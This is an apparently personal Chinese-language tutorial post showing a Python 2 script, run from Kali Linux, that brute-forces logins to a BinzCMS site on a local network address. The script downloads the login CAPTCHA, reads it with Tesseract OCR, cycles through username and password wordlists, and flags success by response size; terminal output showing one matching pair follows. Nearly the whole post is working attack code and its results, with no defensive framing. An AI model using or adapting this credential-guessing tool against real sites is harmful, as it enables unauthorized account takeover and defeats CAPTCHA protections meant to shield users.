python---模拟用户正常登录系统，破解用户名与登录密码

root@kali:~/python/laowangpy/function# touch username.txt
root@kali:~/python/laowangpy/function# touch password.txt
root@kali:~/python/laowangpy/function# ls
username.txt      password.txt
root@kali:~/python/laowangpy/function# vi username.txt
root@kali:~/python/laowangpy/function# vi password.txt
root@kali:~/python/laowangpy/function# cat username.txt
xwb
xudada
xwb
seeker
root@kali:~/python/laowangpy/function# cat password.txt
qwe123456
asd123456
173605852
root@kali:~/python/laowangpy/function#

root@kali:~/python/laowangpy/function# cat postloginbinzcmsautobraekuseerpd.py
#!/usr/bin/python
# --*-- coding:utf-8 --*--

import string
import urllib
import urllib2
import Image
from pytesseract import *
import time

usernamelistdata = []#存储读取目录下username.txt所有用户名信
passwordlistdata = []#存储读取目录下password.txt所有登录密码信息

def getpicyanzhengma():#请求服务器的验证码，并保存pic.png图片格式，与服务器互动
urlget = "http://192.168.40.239/binzcms1/index.php"
ctl = {"ctl":"code"}
ctldata = urllib.urlencode(ctl)
reqget = urllib2.Request(urlget+'?'+ctldata)#构造get请求与参数

#添加get请求的头信息
reqget.add_header("Host","192.168.40.239")
reqget.add_header("User-Agent","Mozilla/5.0 (Windows NT 6.1; WOW64; rv:25.0) Gecko/20100101 Firefox/25.0")
reqget.add_header("Accept","image/png,image/*;q=0.8,*/*;q=0.5")
reqget.add_header("Accept-Language","zh-CN,zh;q=0.8,en-us;q=0.5,en;q=0.3")
reqget.add_header("Accept-Encoding","gzip,deflate")
reqget.add_header("Referer","http://192.168.40.239/binzcms1/index.php")
reqget.add_header("Cookie","style=styles4; PHPSESSID=1kq6ich50b6cb6g3rl75ct2ta4")
reqget.add_header("Connection","keep-alive")

#使用本机进行代理抓包，查看详细的数据包
proxy_handler = urllib2.ProxyHandler({'http': '192.168.40.1:4455'})
opener = urllib2.build_opener(proxy_handler)
urllib2.install_opener(opener)#

resget = urllib2.urlopen(reqget)
resgetdata = resget.read()

#对get请求的数据回包的图片验证码数据，保存为pic.png的图片
f = open("/root/python/laowangpy/function/pic.png","wb")
f.write(resgetdata)
f.close()

def downloadpic():#在特别指定URL地址去下载图片验证码，并保存为pic.png的图片
pic_url = "http://192.168.40.239/binzcms1/index.php?ctl=code"
pic_data_url = urllib2.urlopen(pic_url)
pic_data = pic_data_url.read()
f = open("/root/python/laowangpy/function/pic.png","wb")
f.write(pic_data)
f.close()

def picyanzhengma():#使用pytesseract识别从目标服务器实时下载到最新图片验证码
im = Image.open("/root/python/laowangpy/function/pic.png")
text = image_to_string(im)
#print text
return text

#getpicyanzhengma()#第一步，get请求图片验证码
#picyanzhengma()#调用pytesseract识别图片验证码，并保存为文本文件
#yanzhengma = picyanzhengma()#把函数picyanzhengma返回的文件信息的字值，再赋值给yanzhengma

def postpicyanzhengma(username,password,yanzhengma):#POST请求登录模块。增加头信息，并携带post请求数据，与服务器互动
url = "http://192.168.40.239/binzcms1/index.php?ctl=member&act=front_member_login"#请求post的url地址
values = {"username":username,"password":password,"login_code":yanzhengma,"button":"登录"}#请求的URL地址，post表单数据信息
#print values["login_code"]#查询字典特定key的value值

#在post请求中定义头信息
headers = {"Host":"192.168.40.239","User-Agent" : "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:25.0) Gecko/20100101 Firefox/25.0","Accept" : "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language" : "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3","Accept-Encoding" : "gzip,deflate","Referer" : "http://192.168.40.239/binzcms1/index.php","Cookie" : "style=styles4; PHPSESSID=1kq6ich50b6cb6g3rl75ct2ta4","Connection" : "keep-alive","Content-Type" : "application/x-www-form-urlencoded","Content-Length": "73"}

data = urllib.urlencode(values)#请求post表单数据
req = urllib2.Request(url,data,headers)#请求数据)

#使用本机进行代理抓包，查看详细的数据包
proxy_handler = urllib2.ProxyHandler({'http': '192.168.40.1:4455'})#抓包
opener = urllib2.build_opener(proxy_handler)
urllib2.install_opener(opener)#启用post请求

response = urllib2.urlopen(req)#打开请求的数据
the_page = response.read()#读取并缓存请求到的数据
#print the_page#打印请求到的页面
print "你请求到页面数据包为%d字节,大于1917字符以上说明账户信息正确！！" %len(the_page)#计算请求到的页面数据大小

def readuserpassword():#读取目录下用户名与登录密码信息，生成对应列表
usernamelist = []#存储读取目录下username.txt所有用户名信
passwordlist = []#存储读取目录下password.txt所有登录密码信息
#读取目录下username.txt文件
fileusername = open("/root/python/laowangpy/function/username.txt").read()
#print fileusername
usernamelist = [x for x in fileusername.split("\n")]
#print usernamelist
for x in range(len(usernamelist)):
usernamelistdata.append(usernamelist[x])

#读取目录下的password.txt文件
filepassword = open("/root/python/laowangpy/function/password.txt").read()
#print filepassword
passwordlist = [x for x in filepassword.split("\n")]
#print passwordlist
for y in range(len(passwordlist)):
passwordlistdata.append(passwordlist[y])

readuserpassword()
#print len(passwordlistdata)

for i in xrange(0,len(usernamelistdata)-1):#遍历用户名
for j in xrange(0,len(passwordlistdata)-1):#遍历登录密码
getpicyanzhengma()#第一步，get请求图片验证码
picyanzhengma()#调用pytesseract识别图片验证码，并保存为文本文件
yanzhengma = picyanzhengma()#把函数picyanzhengma返回的文件信息的字值，再赋值给yanzhengma
postpicyanzhengma(usernamelistdata[i],passwordlistdata[j],yanzhengma)#第二步，登录post请求
print "用户名是%s，登录密码是%s" %(usernamelistdata[i],passwordlistdata[j])
time.sleep(1)

root@kali:~/python/laowangpy/function#

root@kali:~/python/laowangpy/function# python postloginbinzcmsautobraekuseerpd.py
Tesseract Open Source OCR Engine v3.02 with Leptonica
Tesseract Open Source OCR Engine v3.02 with Leptonica
你请求到页面数据包为1914字节,大于1917字符以上说明账户信息正确！！
用户名是xwb，登录密码是qwe123456
Tesseract Open Source OCR Engine v3.02 with Leptonica
Tesseract Open Source OCR Engine v3.02 with Leptonica
你请求到页面数据包为1914字节,大于1917字符以上说明账户信息正确！！
用户名是xwb，登录密码是asd123456
Tesseract Open Source OCR Engine v3.02 with Leptonica
Tesseract Open Source OCR Engine v3.02 with Leptonica
你请求到页面数据包为26468字节,大于1917字符以上说明账户信息正确！！
用户名是xwb，登录密码是173605852
Tesseract Open Source OCR Engine v3.02 with Leptonica
Tesseract Open Source OCR Engine v3.02 with Leptonica
你请求到页面数据包为1917字节,大于1917字符以上说明账户信息正确！！
用户名是xudada，登录密码是qwe123456
Tesseract Open Source OCR Engine v3.02 with Leptonica
Tesseract Open Source OCR Engine v3.02 with Leptonica
你请求到页面数据包为1917字节,大于1917字符以上说明账户信息正确！！
用户名是xudada，登录密码是asd123456
Tesseract Open Source OCR Engine v3.02 with Leptonica
Tesseract Open Source OCR Engine v3.02 with Leptonica
你请求到页面数据包为1917字节,大于1917字符以上说明账户信息正确！！
用户名是xudada，登录密码是173605852
Tesseract Open Source OCR Engine v3.02 with Leptonica
Tesseract Open Source OCR Engine v3.02 with Leptonica
你请求到页面数据包为1914字节,大于1917字符以上说明账户信息正确！！
用户名是xwb，登录密码是qwe123456
Tesseract Open Source OCR Engine v3.02 with Leptonica
Tesseract Open Source OCR Engine v3.02 with Leptonica
你请求到页面数据包为1914字节,大于1917字符以上说明账户信息正确！！
用户名是xwb，登录密码是asd123456
Tesseract Open Source OCR Engine v3.02 with Leptonica
Tesseract Open Source OCR Engine v3.02 with Leptonica
你请求到页面数据包为26468字节,大于1917字符以上说明账户信息正确！！
用户名是xwb，登录密码是173605852
Tesseract Open Source OCR Engine v3.02 with Leptonica
Tesseract Open Source OCR Engine v3.02 with Leptonica
你请求到页面数据包为1917字节,大于1917字符以上说明账户信息正确！！
用户名是seeker，登录密码是qwe123456
Tesseract Open Source OCR Engine v3.02 with Leptonica
Tesseract Open Source OCR Engine v3.02 with Leptonica
你请求到页面数据包为1917字节,大于1917字符以上说明账户信息正确！！
用户名是seeker，登录密码是asd123456
Tesseract Open Source OCR Engine v3.02 with Leptonica
Tesseract Open Source OCR Engine v3.02 with Leptonica
你请求到页面数据包为1917字节,大于1917字符以上说明账户信息正确！！
用户名是seeker，登录密码是173605852
root@kali:~/python/laowangpy/function#